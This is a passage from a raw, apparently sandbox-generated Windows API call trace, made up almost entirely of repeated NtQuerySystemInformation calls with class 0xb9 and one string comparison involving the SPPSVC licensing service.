NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca60, Length=0x20, ResultLength=0x0) [0287.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x20, ResultLength=0x0) [0287.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x20, ResultLength=0x0) [0287.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x20, ResultLength=0x0) [0287.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0287.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca60, Length=0x20, ResultLength=0x0) [0287.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0287.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0287.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x58, ResultLength=0x0) [0287.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0287.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0287.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0287.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0287.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0287.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x28, ResultLength=0x0) [0287.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0287.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0287.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0287.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0287.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0287.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0287.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0287.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8c0, Length=0x20, ResultLength=0x0) [0287.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8c0, Length=0x20, ResultLength=0x0) [0287.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8c0, Length=0x20, ResultLength=0x0) [0287.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0287.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0287.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0287.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0287.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0287.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0287.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0287.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0287.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0287.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0287.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0287.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0287.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0287.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0287.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0287.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf28, Length=0x50, ResultLength=0x0) [0287.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x38, ResultLength=0x0) [0287.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0287.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0287.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0287.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0287.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x28, ResultLength=0x0) [0287.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x38, ResultLength=0x0) [0287.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd70, Length=0x28, ResultLength=0x0) [0287.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd70, Length=0x28, ResultLength=0x0) [0287.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x38, ResultLength=0x0) [0287.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x20, ResultLength=0x0) [0287.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x20, ResultLength=0x0) [0287.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x20, ResultLength=0x0) [0287.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x20, ResultLength=0x0) [0287.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x38, ResultLength=0x0) [0287.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x20, ResultLength=0x0) [0287.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0287.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0287.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x50, ResultLength=0x0) [0287.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x38, ResultLength=0x0) [0287.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x28, ResultLength=0x0) [0287.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x28, ResultLength=0x0) [0287.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x28, ResultLength=0x0) [0287.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x28, ResultLength=0x0) [0287.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x28, ResultLength=0x0) [0287.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x38, ResultLength=0x0) [0287.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0287.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc20, Length=0x28, ResultLength=0x0) [0287.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x38, ResultLength=0x0) [0287.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb80, Length=0x20, ResultLength=0x0) [0287.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0287.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0287.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0287.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x38, ResultLength=0x0) [0287.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb80, Length=0x20, ResultLength=0x0) [0287.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0287.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0287.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.524] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0287.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb8, Length=0x50, ResultLength=0x0) [0287.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0287.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0287.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0287.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0287.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb80, Length=0x28, ResultLength=0x0) [0287.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x38, ResultLength=0x0) [0287.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0287.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 